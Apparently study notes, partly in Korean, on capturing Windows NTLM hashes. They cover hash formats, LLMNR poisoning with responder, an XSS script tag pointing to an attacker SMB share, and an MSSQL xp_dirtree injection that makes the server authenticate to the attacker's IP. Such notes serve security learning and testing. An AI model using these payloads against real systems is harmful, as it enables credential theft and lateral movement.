Reference: [0xdf](https://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html#database-access) # NTLM - `LM Hash`: 오래된 Windows 호환성을 위해 사용되던 구식 Hash. 보안이 취약해서 현대 시스템에서는 대부분 비활성화됨. - `NT Hash`: 실제로 인증에 사용되는 주요 해시. 보통 우리가 말하는 `NTLM 해시`는 이 해시를 의미함. - `Pass-the-Hash` 공격에서도 마찬가지로 `NT`해시만 있으면 된다. ```bash # domain\uid:rid:lmhash:nthash Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f::: ``` # LLMNR Poisoning ```bash # start responder responder -I tun0 # visit a network path that doesn't exist \\badservername\share\ # an LLMNR request will go out and you capture a challenge/response. ``` # User Interaction Another way to get an NTLMv2 is to get the user to visit my SMB share. This is commonly seen in phishing campaigns that send `file://` links in email. XSS version ```bash <script language='javascript' src="\\10.10.14.15\share"></script> ``` # Database If I can get the database to request a file from me, I can capture the credentials associated with the database service. Since Windows MSSQL allows stacked commands (`; [another statement]`), I can inject by adding `EXEC master..xp_dirtree "\\$IP\test"; --`. This will cause the db to request the file from me.